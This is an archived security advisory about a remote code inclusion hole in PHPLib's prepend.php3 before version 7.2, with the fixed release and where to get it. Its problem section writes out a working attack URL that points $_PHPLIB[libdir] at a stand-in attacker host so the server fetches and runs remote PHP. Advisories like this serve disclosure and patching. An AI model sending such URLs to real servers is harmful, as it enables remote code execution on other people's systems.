Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: phplib1.htm

PHPLib prior to 7.2 prepend.php3 - non-local code injection



COMMAND

    prepend.php3

SYSTEMS AFFECTED

    PHPLib prior to 7.2

PROBLEM

    Nathan  R.  Hruby  sent  following.   The  PHPLib  Team  announced
    phplib-7.2d,  availible  now.   This  release  fixes  the recently
    discovered hole in prepend.php3  that can allow a  remote attacker
    to inject non-local code into any phplib based script.

    Please  note  that  this  affects  all applications that depend on
    PHPLib.  Some  apps have decided  to distribute phplib  along with
    their app for easier installation.  Please check your phplib  apps
    to determine if this is the case.

    What follows  is the  original announcemnt  of the  hole from  the
    discoverer Giancarlo Pinerolo.  Both PHP3 and PHP4 are vulnerable.
    The use of  _PHPLIB[libdir] first appeared  on versions of  PHPLIB
    starting December 1998.

    In PHP, variables do not have to be declared.  They are created as
    soon as a value is assigned to them.  When PHP is configured  with
    register_globaps  enabled  (as  it   is  by  default),   variables
    submitted  by  the  user  are  available  in the global namespace.
    This means  that, if  a form  or an  URL query  string contains  a
    variable named  "myvar", this  variable is  made available  to the
    script as $myvar.

    Getting  variables  from  user  input  is,  in  the  end, what web
    programming is allabout, but in this case an attacker can  exploit
    the fact that a variable, not  meant to be accepted as input,  can
    actually  make  its  way  in,  because  it has not been previously
    initialized by the script.

    PHP also has  the possibility to  pass associative arrays  via the
    GET or POST methods.  An example is an URL Like this:

        http://www.myhost.com/myscript.php?MYARRAY[element1]

    or a form whose input field looks like this:

        <INPUT type="text" name="MYARRAY[element1]">

    PHP  also  has  the  possibility  to  transparently 'include' in a
    script  other  pieces  of  code  via  the  'include' and 'require'
    functions.  It automatically discerns  if the file to be  included
    is on the local filesystem or  on a remote location, when the  php
    setting php_enable_fsockopen is true.

        include("myfile.php")  # will include it from the local filesystem
        include("http://www.there.com/myfile.php")  # will include it from
                                                    # the net

    By providind a value for the the array element   $_PHPLIB[libdir],
    an intruder can  force a script  to load and  execute scripts from
    another server.   This is  because the  value of  $_PHPLIB[libdir]
    gets initalized *only* if not already set.

    This  is  particularly  gravious  because,  in  the  normal PHPLIB
    installation,  loadin  other  libraries   is  done  at  the   very
    beginning.

    The first  instructions in  the file  'prepend.php3', that  is the
    very  first  file  which  normally  gets  included  in  all PHPLIB
    installation, is:

        require($_PHPLIB["libdir"] . "db_mysql.inc");

    or other filenames like 'db_pgsql.inc' for the postgres  database,
    depending on the  database in use.   If, in te  above instruction,
    $_PHPLIB[libdir] is a string whose value is "http://attacker.com/"
    the instrucion executed will be:

        require("http://attacker.com/" . "db_mysql.inc");

    Thus, simply crafting and opening with a browser an URL like:

        http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/

    will  make  the  script  'page.php',  which  the attacker knows is
    based on  the PHPLIB  toolkit, include  and execute  any arbitrary
    php instruction contained in  a file named 'db_mysql.inc',  loaded
    via an  http request  for it,  located, in  the example  above, in
    the   document   root   of    the   'attacker.com'   web    server
    (http://attacker.com/db_mysql.inc)

SOLUTION

    The current  phplib.netuse.de site  will be  shortly removing  all
    downloads  and  re-directing  users  to  the new SourceForge site.
    Please be sure to keep an eye on

        http://sourceforge.net/projects/phplib/

    Bug above is fixed now.

    For Trustix Linux:

        http://www.trustix.net/pub/Trustix/updates/
        ftp://ftp.trustix.net/pub/Trustix/updates/
        ftp://ftp.trustix.net/pub/Trustix/software/swup/
           ./1.5/SRPMS/phplib-7.2d-1tr.src.rpm
           ./1.5/RPMS/phplib-7.2d-1tr.noarch.rpm
           ./1.2/SRPMS/phplib-7.2d-1tr.src.rpm
           ./1.2/RPMS/phplib-7.2d-1tr.noarch.rpm
           ./1.1/SRPMS/phplib-7.2d-1tr.src.rpm
           ./1.1/RPMS/phplib-7.2d-1tr.noarch.rpm


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH